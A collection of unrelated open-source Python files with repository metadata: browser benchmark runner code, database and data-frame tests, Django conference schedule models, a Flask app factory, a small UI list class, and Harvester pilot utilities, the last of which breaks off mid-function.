# Print current exception and propagate existing exception.
exception_formatter.PrintFormattedException(
msg='Exception from TearDownState:')
def ValidateStory(story):
if len(story.name) > 180:
raise ValueError(
'User story has name exceeding 180 characters: %s' %
story.name)
def _ShouldRunBenchmark(benchmark, possible_browser, finder_options):
if finder_options.print_only:
return True # Should always run on print-only mode.
if benchmark.CanRunOnPlatform(possible_browser.platform, finder_options):
return True
print('Benchmark "%s" is not supported on the current platform. If this '
"is in error please add it to the benchmark's SUPPORTED_PLATFORMS."
% benchmark.Name())
return False
def RunBenchmark(benchmark, finder_options):
"""Run this test with the given options.
Returns:
An exit code from exit_codes module describing what happened.
"""
benchmark_name = benchmark.Name()
if not re.match(_RE_VALID_TEST_SUITE_NAME, benchmark_name):
logging.fatal('Invalid benchmark name: %s', benchmark_name)
return 2 # exit_codes.FATAL_ERROR
possible_browser = browser_finder.FindBrowser(finder_options)
if not possible_browser:
print('No browser of type "%s" found for running benchmark "%s".' % (
finder_options.browser_options.browser_type, benchmark.Name()))
return exit_codes.ALL_TESTS_SKIPPED
benchmark.CustomizeOptions(finder_options, possible_browser)
with results_options.CreateResults(
finder_options,
benchmark_name=benchmark_name,
benchmark_description=benchmark.Description(),
report_progress=not finder_options.suppress_gtest_report) as results:
if not _ShouldRunBenchmark(benchmark, possible_browser, finder_options):
return exit_codes.ALL_TESTS_SKIPPED
test = benchmark.CreatePageTest(finder_options)
test.__name__ = benchmark.__class__.__name__
story_set = benchmark.CreateStorySet(finder_options)
if isinstance(test, legacy_page_test.LegacyPageTest):
if any(not isinstance(p, page.Page) for p in story_set.stories):
raise Exception(
'PageTest must be used with StorySet containing only '
'telemetry.page.Page stories.')
results.AddSharedDiagnostics(
architecture=possible_browser.platform.GetArchName(),
device_id=possible_browser.platform.GetDeviceId(),
os_name=possible_browser.platform.GetOSName(),
os_version=possible_browser.platform.GetOSVersionName(),
os_detail_vers=possible_browser.platform.GetOSVersionDetailString(),
owners=benchmark.GetOwners(),
bug_components=benchmark.GetBugComponents(),
documentation_urls=benchmark.GetDocumentationLinks(),
info_blurb=benchmark.GetInfoBlurb(),
)
try:
RunStorySet(
test, story_set, finder_options, results, benchmark.max_failures,
possible_browser)
if results.benchmark_interrupted:
return_code = exit_codes.FATAL_ERROR
elif results.had_failures:
return_code = exit_codes.TEST_FAILURE
elif results.had_successes:
return_code = exit_codes.SUCCESS
else:
return_code = exit_codes.ALL_TESTS_SKIPPED
except Exception as exc: # pylint: disable=broad-except
interruption = 'Benchmark execution interrupted: %r' % exc
results.InterruptBenchmark(interruption)
exception_formatter.PrintFormattedException()
return_code = exit_codes.FATAL_ERROR
return return_code
def _UpdateAndCheckArchives(archive_data_file, wpr_archive_info,
filtered_stories, story_filter):
"""Verifies that all stories are local or have WPR archives.
  Logs the problems and raises an ArchiveError if any are missing.
"""
# Report any problems with the entire story set.
story_names = [s.name for s in filtered_stories
if not s.is_local and not story_filter.ShouldSkip(s)]
if story_names:
if not archive_data_file:
logging.error('The story set is missing an "archive_data_file" '
'property.\nTo run from live sites pass the flag '
'--use-live-sites.\nTo create an archive file add an '
'archive_data_file property to the story set and then '
'run record_wpr.')
raise ArchiveError('No archive data file.')
if not wpr_archive_info:
logging.error('The archive info file is missing.\n'
'To fix this, either add svn-internal to your '
'.gclient using http://goto/read-src-internal, '
'or create a new archive using record_wpr.')
raise ArchiveError('No archive info file.')
wpr_archive_info.DownloadArchivesIfNeeded(story_names=story_names)
# Report any problems with individual story.
stories_missing_archive_path = []
stories_missing_archive_data = []
for story in filtered_stories:
if not story.is_local and not story_filter.ShouldSkip(story):
archive_path = wpr_archive_info.WprFilePathForStory(story)
if not archive_path:
stories_missing_archive_path.append(story)
elif not os.path.isfile(archive_path):
stories_missing_archive_data.append(story)
if stories_missing_archive_path:
logging.error(
'The story set archives for some stories do not exist.\n'
'To fix this, record those stories using record_wpr.\n'
'To ignore this warning and run against live sites, '
'pass the flag --use-live-sites.')
logging.error(
'stories without archives: %s',
', '.join(story.name
for story in stories_missing_archive_path))
if stories_missing_archive_data:
logging.error(
'The story set archives for some stories are missing.\n'
'Someone forgot to check them in, uploaded them to the '
'wrong cloud storage bucket, or they were deleted.\n'
'To fix this, record those stories using record_wpr.\n'
'To ignore this warning and run against live sites, '
'pass the flag --use-live-sites.')
logging.error(
'stories missing archives: %s',
', '.join(story.name
for story in stories_missing_archive_data))
if stories_missing_archive_path or stories_missing_archive_data:
raise ArchiveError('Archive file is missing stories.')
# Only run valid stories if no problems with the story set or
# individual stories.
return True
def _WaitForThermalThrottlingIfNeeded(platform):
if not platform.CanMonitorThermalThrottling():
return
thermal_throttling_retry = 0
while (platform.IsThermallyThrottled() and
thermal_throttling_retry < 3):
logging.warning('Thermally throttled, waiting (%d)...',
thermal_throttling_retry)
thermal_throttling_retry += 1
time.sleep(thermal_throttling_retry * 2)
if thermal_throttling_retry and platform.IsThermallyThrottled():
logging.warning('Device is thermally throttled before running '
'performance tests, results will vary.')
def _CheckThermalThrottling(platform):
if not platform.CanMonitorThermalThrottling():
return
if platform.HasBeenThermallyThrottled():
logging.warning('Device has been thermally throttled during '
'performance tests, results will vary.')
|
{
"content_hash": "0084b3238a3f14d0b67f0a11ba38572c",
"timestamp": "",
"source": "github",
"line_count": 568,
"max_line_length": 80,
"avg_line_length": 41.434859154929576,
"alnum_prop": 0.6775015933715742,
"repo_name": "catapult-project/catapult",
"id": "ae0b4c08fd409ef303cb9db552eafb5ea532fd36",
"size": "23698",
"binary": false,
"copies": "6",
"ref": "refs/heads/main",
"path": "telemetry/telemetry/internal/story_runner.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1324"
},
{
"name": "C++",
"bytes": "46069"
},
{
"name": "CSS",
"bytes": "23376"
},
{
"name": "Dockerfile",
"bytes": "1541"
},
{
"name": "Go",
"bytes": "114396"
},
{
"name": "HTML",
"bytes": "12394298"
},
{
"name": "JavaScript",
"bytes": "1559584"
},
{
"name": "Makefile",
"bytes": "1774"
},
{
"name": "Python",
"bytes": "6778695"
},
{
"name": "Shell",
"bytes": "2288"
}
],
"symlink_target": ""
}
|
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import sys
from cassandra.cqlengine.connection import get_session
class BaseCassEngTestCase(unittest.TestCase):
session = None
def setUp(self):
self.session = get_session()
def assertHasAttr(self, obj, attr):
self.assertTrue(hasattr(obj, attr),
"{0} doesn't have attribute: {1}".format(obj, attr))
def assertNotHasAttr(self, obj, attr):
self.assertFalse(hasattr(obj, attr),
"{0} shouldn't have the attribute: {1}".format(obj, attr))
if sys.version_info > (3, 0):
def assertItemsEqual(self, first, second, msg=None):
return self.assertCountEqual(first, second, msg)
|
{
"content_hash": "23827ceffd002962938328903eb260eb",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 74,
"avg_line_length": 27,
"alnum_prop": 0.6481481481481481,
"repo_name": "tempbottle/python-driver",
"id": "856f2bac4fa170bbfc4ba5e2dcf01c6016c792b5",
"size": "1330",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "tests/integration/cqlengine/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "28918"
},
{
"name": "Python",
"bytes": "1711786"
}
],
"symlink_target": ""
}
|
"""Convenience wrapper for starting an appengine tool."""
import os
import sys
if not hasattr(sys, 'version_info'):
sys.stderr.write('Very old versions of Python are not supported. Please '
'use version 2.5 or greater.\n')
sys.exit(1)
version_tuple = tuple(sys.version_info[:2])
if version_tuple < (2, 4):
sys.stderr.write('Error: Python %d.%d is not supported. Please use '
'version 2.5 or greater.\n' % version_tuple)
sys.exit(1)
if version_tuple == (2, 4):
sys.stderr.write('Warning: Python 2.4 is not supported; this program may '
'break. Please use version 2.5 or greater.\n')
DIR_PATH = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
SCRIPT_DIR = os.path.join(DIR_PATH, 'google', 'appengine', 'tools')
EXTRA_PATHS = [
DIR_PATH,
os.path.join(DIR_PATH, 'lib', 'antlr3'),
os.path.join(DIR_PATH, 'lib', 'django'),
os.path.join(DIR_PATH, 'lib', 'webob'),
os.path.join(DIR_PATH, 'lib', 'yaml', 'lib'),
]
SCRIPT_EXCEPTIONS = {
"dev_appserver.py" : "dev_appserver_main.py"
}
def run_file(file_path, globals_, script_dir=SCRIPT_DIR):
"""Execute the file at the specified path with the passed-in globals."""
sys.path = EXTRA_PATHS + sys.path
script_name = os.path.basename(file_path)
script_name = SCRIPT_EXCEPTIONS.get(script_name, script_name)
script_path = os.path.join(script_dir, script_name)
execfile(script_path, globals_)
if __name__ == '__main__':
run_file(__file__, globals())
|
{
"content_hash": "c484916de225325edba744333472dea3",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 76,
"avg_line_length": 34.04545454545455,
"alnum_prop": 0.6528704939919893,
"repo_name": "jamslevy/gsoc",
"id": "9bda605d480b8b88c26f70d1a19126ad349565fc",
"size": "2099",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "thirdparty/google_appengine/bulkloader.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "JavaScript",
"bytes": "388268"
},
{
"name": "Perl",
"bytes": "66733"
},
{
"name": "Python",
"bytes": "8290513"
},
{
"name": "Shell",
"bytes": "5570"
}
],
"symlink_target": ""
}
|
from datetime import datetime
import bleach
import markdown
from django.db import models
""" Presentation """
class Speaker(models.Model):
""" Who """
email = models.EmailField(unique=True)
full_name = models.CharField(max_length=255)
bio = models.TextField(default='')
twitter_username = models.CharField(max_length=255, null=True, blank=True)
company_name = models.CharField(max_length=255, null=True, blank=True)
url = models.URLField(max_length=2048, null=True, blank=True)
shirt_size = models.CharField(max_length=255)
location = models.CharField(max_length=255, null=True, blank=True)
is_keynote = models.BooleanField(default=False)
def __str__(self):
return self.full_name
@property
def twitter_url(self):
if not self.twitter_username:
return None
return 'https://twitter.com/{}'.format(self.twitter_username)
def bio_html(self):
return markdown.markdown(bleach.clean(self.bio), extensions=["extra"], safe_mode=False)
class Presentation(models.Model):
""" What """
papercall_id = models.IntegerField(null=True, blank=True, unique=True)
title = models.CharField(max_length=255)
description = models.TextField(default='')
notes = models.TextField(default='')
abstract = models.TextField(default='')
audience_level = models.CharField(max_length=255)
presentation_format = models.CharField(max_length=255)
speaker = models.ForeignKey(Speaker)
def __str__(self):
return self.title
class Meta:
ordering = ('title',)
def description_html(self):
return markdown.markdown(bleach.clean(self.description), extensions=["extra"], safe_mode=False)
@property
def is_tutorial(self):
return self.slotevent.location.track == Location.Tracks.TRACK_TUTORIAL
""" Schedule """
class Schedule(models.Model):
""" When (what day) """
day = models.DateField(unique=True)
def __str__(self):
return self.day.strftime('%b %d')
class Location(models.Model):
""" Where """
class Tracks(object):
TRACK_ONE = 'track-1'
TRACK_TWO = 'track-2'
TRACK_THREE = 'track-3'
TRACK_TUTORIAL = 'tutorial'
choices = (
(TRACK_ONE, 'Track 1'),
(TRACK_TWO, 'Track 2'),
(TRACK_THREE, 'Track 3'),
(TRACK_TUTORIAL, 'Tutorial'),
)
name = models.CharField(max_length=255)
order = models.PositiveIntegerField(default=0)
capacity = models.PositiveIntegerField(default=0)
notes = models.TextField(default='', blank=True)
track = models.CharField(max_length=255, choices=Tracks.choices, null=True, blank=True)
def __str__(self):
return self.name
class ScheduleSlot(models.Model):
""" When (what time) """
schedule = models.ForeignKey(Schedule, related_name='slots')
start_time = models.TimeField()
end_time = models.TimeField()
ref = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return '{} - {} ({})'.format(self.start_time, self.end_time, self.schedule)
class Meta:
unique_together = (('schedule', 'start_time', 'end_time'),)
ordering = ('schedule', 'start_time', 'end_time')
@property
def duration(self):
return datetime.combine(self.schedule.day, self.end_time) - datetime.combine(self.schedule.day, self.start_time)
@property
def start_events(self):
return SlotEvent.objects.select_related('location').filter(slot__schedule=self.schedule,
slot__start_time=self.start_time).order_by(
'location__order')
class SlotEvent(models.Model):
""" Glue what with when and where """
slot = models.ForeignKey(ScheduleSlot, related_name='events')
location = models.ForeignKey(Location, null=True, blank=True)
content = models.TextField('Content (EN)', blank=True)
content_fr = models.TextField('Content (FR)', blank=True)
presentation = models.OneToOneField(Presentation, null=True, blank=True)
def __str__(self):
return self.title
class Meta:
unique_together = (
('slot', 'location'),
)
ordering = ('location__order',)
@property
def title(self):
if self.presentation:
return self.presentation.title
return self.content
@property
def is_presentation(self):
return bool(self.presentation)
@property
def duration(self):
return self.slot.duration
@property
def duration_str(self):
return ':'.join(str(self.duration).split(':')[:2])
@property
def presenter(self):
if self.presentation:
return self.presentation.speaker
|
{
"content_hash": "519745c38ca15eab4adc2c4a2e0c555e",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 120,
"avg_line_length": 29.06024096385542,
"alnum_prop": 0.6314262023217247,
"repo_name": "pyconca/2017-web",
"id": "2135402ce3ea9aaa1a977601c1a67f65727cb992",
"size": "4824",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyconca2017/pycon_schedule/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4073"
},
{
"name": "HTML",
"bytes": "123355"
},
{
"name": "JavaScript",
"bytes": "3928"
},
{
"name": "Python",
"bytes": "94813"
},
{
"name": "Shell",
"bytes": "4946"
}
],
"symlink_target": ""
}
|
""" Tests import_csv functionality with varying parameters"""
import unittest
from sparktkregtests.lib import sparktk_test
class FrameCreateTest(sparktk_test.SparkTKTestCase):
def setUp(self):
"""Build frames to be exercised and establish known baselines"""
super(FrameCreateTest, self).setUp()
self.dataset = [["Bob", 30, 8], ["Jim", 45, 9.5], ["Sue", 25, 7], ["George", 15, 6], ["Jennifer", 18, 8.5]]
self.schema = [("C0", str), ("C1", int), ("C2", float)]
self.frame = self.context.frame.create(self.dataset,
schema=self.schema)
def test_frame_invalid_column(self):
"""Tests retrieving an invalid column errors."""
with self.assertRaisesRegexp(Exception, "Invalid column name"):
self.frame.take(100, columns=['not_in'])
def test_frame_create_row_count(self):
""" Trivial Frame creation. """
frame = self.context.frame.create(self.dataset,
schema=self.schema)
self.assertEqual(frame.count(), len(self.dataset))
self.assertEqual(len(frame.take(3)), 3)
# test to see if taking more rows than exist still
# returns only the right number of rows
self.assertEqual(len(frame.take(10)), len(self.dataset))
def test_schema_duplicate_names_diff_type(self):
"""CsvFile creation fails with duplicate names, different type."""
# double num1's same type
bad = [("col1", str), ("col1", int), ("col2", float)]
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad)
def test_schema_duplicate_names_same_type(self):
"""CsvFile creation fails with duplicate names, same type."""
# two num1's with same type
# note that this should only throw an error because
# the column names are duplicate, not because the
# column types are not valid, the column types being invalid
# should only trigger an exception if validate_schema=True
bad = [("col1", int), ("col1", int), ("col2", int)]
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad)
def test_schema_invalid_type(self):
"""CsvFile cration with a schema of invalid type fails."""
bad_schema = -77
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad_schema)
def test_schema_invalid_format(self):
"""CsvFile creation fails with a malformed schema."""
bad_schema = [int, int, float, float, str]
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad_schema)
def test_without_schema(self):
"""Test import_csv without a specified schema"""
frame = self.context.frame.create(self.dataset)
self.assertEqual(frame.schema, self.schema)
def test_with_validate_schema_no_schema_provided(self):
"""Test import_csv without a specified schema"""
frame = self.context.frame.create(self.dataset, validate_schema=True)
self.assertEqual(frame.schema, self.schema)
def test_with_validate_schema_with_valid_schema(self):
"""Test with validate_schema true and also a valid schema"""
# should default to using the defined schema
frame = self.context.frame.create(self.dataset,
validate_schema=True,
schema=self.schema)
self.assertEqual(frame.schema, self.schema)
def test_validate_schema_with_invalid_schema_all_columns_same_datatype(self):
"""Test with validate_schema=True and invalid schema, columns same type"""
invalid_schema = [("col1", int), ("col2", int), ("col3", int)]
validated_frame = self.context.frame.create(self.dataset,
validate_schema=True,
schema=invalid_schema)
for row in validated_frame.take(validated_frame.count()):
for item in row:
if type(item) is not int:
self.assertEqual(item, None)
def test_validate_schema_with_invalid_schema_col_dif_datatypes(self):
"""Test with validate schema true and column datatypes inconsistent"""
dataset = [(98, 55), (3, 24), ("Bob", 30)]
schema = [("col1", int), ("col2", int)]
frame = self.context.frame.create(dataset,
schema=schema,
validate_schema=True)
for row in frame.take(frame.count()):
for item in row:
if type(item) is not int:
self.assertEqual(item, None)
def test_validate_schema_of_strs(self):
"""Test validate schema true with schema of strs"""
schema = [("C0", str), ("C1", str), ("C2", str)]
# should not throw an exception
# if the datatype can be cast to the schema-specified
# datatype validate schema should just cast it
# since ints and floats can be cast to string
# it should not error but should cast all of the data to strings
frame = self.context.frame.create(self.dataset, schema=schema, validate_schema=True)
for row in frame.take(frame.count()):
# the data should all be cast to str by validate_schema=True
for item in row:
self.assertEqual(type(item), str)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "d7fae7f8b1630a51a62d66e33dade3e9",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 115,
"avg_line_length": 48.285714285714285,
"alnum_prop": 0.6005917159763313,
"repo_name": "trustedanalytics/spark-tk",
"id": "42bbb10423b22c7c990d514bf3790e2f0ee9d918",
"size": "6451",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "regression-tests/sparktkregtests/testcases/frames/frame_create_from_rows_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "31130"
},
{
"name": "Python",
"bytes": "1763489"
},
{
"name": "R",
"bytes": "2242"
},
{
"name": "Scala",
"bytes": "2249490"
},
{
"name": "Shell",
"bytes": "29498"
}
],
"symlink_target": ""
}
|
"""
ListScreen
==========
XML Definition
.. code-block:: xml
<screen name="foo" type="list">
<label>displayed label</label>
</screen>
"""
import logging
from math import floor
from screenflow.screens import Screen
from screenflow.constants import XML_NAME
# Configure logger.
logging.basicConfig()
logger = logging.getLogger(__name__)
class ListScreen(Screen):
"""To document.
"""
#
HORIZONTAL = 0
#
VERTICAL = 1
    def __init__(self, name, orientation=VERTICAL):
        """Default constructor.
        :param name: Name of this screen.
        :param orientation: List orientation, HORIZONTAL or VERTICAL.
        """
        super(ListScreen, self).__init__(name)
        self.orientation = orientation
        # Callbacks registered through the provider() / renderer() decorator
        # methods; kept under private names so they do not shadow the methods.
        self._provider = None
        self._renderer = None
        self._data = None
        self._surfaces = []
@property
def data(self):
"""
:returns:
"""
if self._data is None:
if self.provider is None:
raise AttributeError('Data provider not settled')
self._data = self.provider()
return self._data
def provider(self, function):
"""Decorator method that registers the given function as data provider.
:param function: Decorated function to use as data provider.
:returns: Given function to match decorator pattern.
"""
        self._provider = function
return function
def renderer(self, function):
"""Decorator method that registers the given function as data renderer.
:param function: Decorated function to use as data renderer.
:returns: Given function to match decorator pattern.
"""
        self._renderer = function
return function
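    # Illustrative decorator usage (a sketch, not part of the original file):
    #
    #   screen = ListScreen('menu')
    #
    #   @screen.provider
    #   def items():
    #       return ['New game', 'Options', 'Quit']
    #
    #   @screen.renderer
    #   def render(item, surface):
    #       ...  # draw one item onto its dedicated surface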
    def get_item_surface(self, i):
        """Return the cached surface for item *i*.
        The cache grows on demand; surface creation itself is still a TODO,
        so missing entries are stored as None placeholders.
        """
        while len(self._surfaces) <= i:
            self._surfaces.append(None)
        return self._surfaces[i]
    def draw(self, surface):
        """Drawing method, draws the visible list items using the renderer.
        :param surface: Surface to draw this screen into.
        """
        super(ListScreen, self).draw(surface)
        # TODO : Draw up scroller.
        # TODO : Compute real item and container sizes (still unresolved).
        item_size = None
        container_size = None
        n = container_size[self.orientation] / item_size[self.orientation]
        for i in range(n):
            item_surface = self.get_item_surface(i)
            self._renderer(self.data[i], item_surface)
        # TODO : Draw down scroller.
|
{
"content_hash": "392f7104f5ccaacb97469bab1d43c026",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 79,
"avg_line_length": 25.79381443298969,
"alnum_prop": 0.5831334932054356,
"repo_name": "Faylixe/screenflow",
"id": "2ea9e2eb1bff714a259fa89ee5a2d38f6f760bd8",
"size": "2541",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "screenflow/screens/list_screen.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "71588"
}
],
"symlink_target": ""
}
|
"""The app module, containing the app factory function."""
import os
from flask import Flask, render_template
from colorsearchtest.settings import ProdConfig
from colorsearchtest.assets import assets
from colorsearchtest.extensions import (
cache,
db,
migrate,
debug_toolbar,
)
from colorsearchtest import public
def create_app(config_object=ProdConfig):
"""An application factory, as explained here:
http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
register_loggers(app)
register_extensions(app)
register_blueprints(app)
register_errorhandlers(app)
return app
def register_extensions(app):
assets.init_app(app)
cache.init_app(app)
db.init_app(app)
debug_toolbar.init_app(app)
migrate.init_app(app, db)
return None
def register_blueprints(app):
app.register_blueprint(public.views.blueprint)
return None
def register_errorhandlers(app):
def render_error(error):
# If a HTTPException, pull the `code` attribute; default to 500
error_code = getattr(error, 'code', 500)
return render_template("{0}.html".format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_loggers(app):
if not app.debug and os.environ.get('HEROKU') is None:
import logging
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler('log/colorsearchtest.log', 'a', 1 * 1024 * 1024, 10)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('colorsearchtest startup')
if os.environ.get('HEROKU') is not None:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('colorsearchtest startup')
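# Minimal usage sketch (not part of the original module): the factory is meant
# to be called from a WSGI entry point or manage script, e.g.
#
#   from colorsearchtest.app import create_app
#   app = create_app()    # defaults to ProdConfig
#   app.run()             # or hand `app` to a WSGI server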
|
{
"content_hash": "ff637974604f71b27e92582349699f0f",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 123,
"avg_line_length": 30.76388888888889,
"alnum_prop": 0.691196388261851,
"repo_name": "Jaza/colorsearchtest",
"id": "43585caa4d096dd43bea411754e70b7b3097047c",
"size": "2239",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "colorsearchtest/app.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1170"
},
{
"name": "HTML",
"bytes": "25058"
},
{
"name": "JavaScript",
"bytes": "240884"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "59086"
}
],
"symlink_target": ""
}
|
try:
import configparser
except:
import ConfigParser as configparser
def test_config(config):
assert config.templates_dir == '~/.latest/templates/'
assert config.pyexpr_entry == r'\{\$'
assert config.pyexpr_exit == r'\$\}'
assert config.env_entry == r'<<<'
assert config.env_exit == r'>>>'
def test_non_existing_config(non_existing_config):
assert non_existing_config.env_entry == r'\\begin\{latest\}'
|
{
"content_hash": "71316b0abd2d8fc93fbac7b68f8b15ce",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 64,
"avg_line_length": 27.375,
"alnum_prop": 0.6598173515981736,
"repo_name": "bluephlavio/latest",
"id": "917ad5a4421587d45c686ca06a094f7adb6eb3d6",
"size": "438",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20373"
},
{
"name": "TeX",
"bytes": "316"
}
],
"symlink_target": ""
}
|
import os
import os.path
import socket
from pilot.common.exception import FileHandlingFailure
from pilot.util.config import config
from pilot.util.filehandling import write_json, touch, remove, read_json, get_checksum_value
from pilot.util.timing import time_stamp
import logging
logger = logging.getLogger(__name__)
def dump(obj):
"""
function for debugging - dumps object to sysout
"""
for attr in dir(obj):
print("obj.%s = %r" % (attr, getattr(obj, attr)))
def is_harvester_mode(args):
"""
Determine if the pilot is running in Harvester mode.
:param args: Pilot arguments object.
:return: Boolean.
"""
if (args.harvester_workdir != '' or args.harvester_datadir != '') and not args.update_server:
harvester = True
elif (args.harvester_eventstatusdump != '' or args.harvester_workerattributes != '') and not args.update_server:
harvester = True
elif ('HARVESTER_ID' in os.environ or 'HARVESTER_WORKER_ID' in os.environ) and args.harvester_submitmode.lower() == 'push':
harvester = True
else:
harvester = False
return harvester
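# Illustrative sketch (hypothetical argument values, not from the original
# module): any harvester path argument combined with server updates disabled
# switches the pilot into Harvester mode, e.g.
#
#   args.harvester_workdir = '/data/harvester'
#   args.update_server = False
#   is_harvester_mode(args)   # -> True
#
# while a pilot with no harvester arguments and no HARVESTER_* environment
# variables stays in normal mode (-> False).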
def get_job_request_file_name():
"""
Return the name of the job request file as defined in the pilot config file.
:return: job request file name.
"""
#logger.debug('config.Harvester.__dict__ : {0}'.format(config.Harvester.__dict__))
return os.path.join(os.environ['PILOT_HOME'], config.Harvester.job_request_file)
def remove_job_request_file():
"""
Remove an old job request file when it is no longer needed.
:return:
"""
path = get_job_request_file_name()
if os.path.exists(path):
if remove(path) == 0:
logger.info('removed %s' % path)
else:
logger.debug('there is no job request file')
def request_new_jobs(njobs=1):
"""
Inform Harvester that the pilot is ready to process new jobs by creating a job request file with the desired
number of jobs.
:param njobs: Number of jobs. Default is 1 since on grids and clouds the pilot does not know how many jobs it can
process before it runs out of time.
:return:
"""
path = get_job_request_file_name()
dictionary = {'nJobs': njobs}
# write it to file
try:
write_json(path, dictionary)
except FileHandlingFailure:
raise FileHandlingFailure
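# For reference, the job request file written above is a small json document
# of the form (its path comes from config.Harvester.job_request_file):
#
#   {"nJobs": 1}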
def kill_worker():
"""
Create (touch) a kill_worker file in the pilot launch directory.
    This file will let Harvester know that the pilot has finished.
:return:
"""
touch(os.path.join(os.environ['PILOT_HOME'], config.Harvester.kill_worker_file))
def get_initial_work_report():
"""
Prepare the work report dictionary.
Note: the work_report should also contain all fields defined in parse_jobreport_data().
:return: work report dictionary.
"""
work_report = {'jobStatus': 'starting',
'messageLevel': logging.getLevelName(logger.getEffectiveLevel()),
'cpuConversionFactor': 1.0,
'cpuConsumptionTime': '',
'node': socket.gethostname(),
'workdir': '',
'timestamp': time_stamp(),
'endTime': '',
'transExitCode': 0,
'pilotErrorCode': 0, # only add this in case of failure?
}
return work_report
def get_event_status_file(args):
"""
Return the name of the event_status.dump file as defined in the pilot config file
and from the pilot arguments.
:param args: Pilot arguments object.
    :return: event status file name.
"""
logger.debug('config.Harvester.__dict__ : {0}'.format(config.Harvester.__dict__))
if args.harvester_workdir != '':
work_dir = args.harvester_workdir
else:
work_dir = os.environ['PILOT_HOME']
event_status_file = config.Harvester.stageoutnfile
event_status_file = os.path.join(work_dir, event_status_file)
logger.debug('event_status_file = {}'.format(event_status_file))
return event_status_file
def get_worker_attributes_file(args):
"""
Return the name of the worker attributes file as defined in the pilot config file
and from the pilot arguments.
:param args: Pilot arguments object.
:return: worker attributes file name.
"""
logger.debug('config.Harvester.__dict__ : {0}'.format(config.Harvester.__dict__))
if args.harvester_workdir != '':
work_dir = args.harvester_workdir
else:
work_dir = os.environ['PILOT_HOME']
worker_attributes_file = config.Harvester.workerattributesfile
worker_attributes_file = os.path.join(work_dir, worker_attributes_file)
logger.debug('worker_attributes_file = {}'.format(worker_attributes_file))
return worker_attributes_file
def findfile(path, name):
"""
find the first instance of file in the directory tree
:param path: directory tree to search
:param name: name of the file to search
:return: the path to the first instance of the file
"""
for root, dirs, files in os.walk(path):
if name in files:
return os.path.join(root, name)
return ''
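# Example (hypothetical paths, for illustration only):
#   findfile('/pilot/work', 'payload.json') walks '/pilot/work' and returns
#   something like '/pilot/work/subdir/payload.json', or '' if no file with
#   that name exists anywhere under the tree.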
def publish_stageout_files(job, event_status_file):
"""
    Publish the stageout file information for Harvester to the event status file.
    The resulting json maps the job id to a list of log and output file descriptions.
    :param job: job object.
    :param event_status_file: name of the event status file (string).
    :return: Boolean. Status of writing the file information to a json.
"""
# get the harvester workdir from the event_status_file
work_dir = os.path.dirname(event_status_file)
out_file_report = {}
out_file_report[job.jobid] = []
# first look at the logfile information (logdata) from the FileSpec objects
for fspec in job.logdata:
logger.debug("File {} will be checked and declared for stage out".format(fspec.lfn))
# find the first instance of the file
filename = os.path.basename(fspec.surl)
path = findfile(work_dir, filename)
logger.debug("Found File {} at path - {}".format(fspec.lfn, path))
#
file_desc = {}
file_desc['type'] = fspec.filetype
file_desc['path'] = path
file_desc['guid'] = fspec.guid
file_desc['fsize'] = fspec.filesize
file_desc['chksum'] = get_checksum_value(fspec.checksum)
logger.debug("File description - {} ".format(file_desc))
out_file_report[job.jobid].append(file_desc)
# Now look at the output file(s) information (outdata) from the FileSpec objects
for fspec in job.outdata:
logger.debug("File {} will be checked and declared for stage out".format(fspec.lfn))
if fspec.status != 'transferred':
logger.debug('will not add the output file to the json since it was not produced or transferred')
else:
# find the first instance of the file
filename = os.path.basename(fspec.surl)
path = findfile(work_dir, filename)
if not path:
                logger.warning('file %s was not found - will not be added to json', filename)
else:
logger.debug("Found File {} at path - {}".format(fspec.lfn, path))
#
file_desc = {}
file_desc['type'] = fspec.filetype
file_desc['path'] = path
file_desc['guid'] = fspec.guid
file_desc['fsize'] = fspec.filesize
